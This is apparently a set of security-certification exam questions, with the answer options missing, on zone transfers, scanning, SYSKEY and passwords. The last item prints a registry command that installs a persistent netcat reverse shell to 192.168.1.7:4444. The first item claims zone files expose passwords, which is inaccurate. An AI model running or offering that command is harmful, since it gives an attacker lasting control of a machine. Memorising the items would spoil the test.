MultipleChoice
In the DNS Zone transfer enumeration, an attacker attempts to retrieve a copy of the entire zone file for a domain from a DNS server. The information provided by the DNS zone can help an attacker gather user names, passwords, and other valuable information. To attempt a zone transfer, an attacker must be connected to a DNS server that is the authoritative server for that zone. Besides this, an attacker can launch a Denial of Service attack against the zone's DNS servers by flooding them with a lot of requests. Which of the following tools can an attacker use to perform a DNS zone transfer?
Each correct answer represents a complete solution. Choose all that apply.
OptionsMultipleChoice
In which of the following scanning methods does an attacker send SYN packets and then a RST packet?
OptionsMultipleChoice
How many bits does SYSKEY use for encryption?
OptionsMultipleChoice
Which of the following options holds the strongest password?
OptionsMultipleChoice
You run the following command on the remote Windows server 2003 computer:
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t
REG_SZ /d 'c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe'
What task do you want to perform by running this command?
Each correct answer represents a complete solution. Choose all that apply.
Options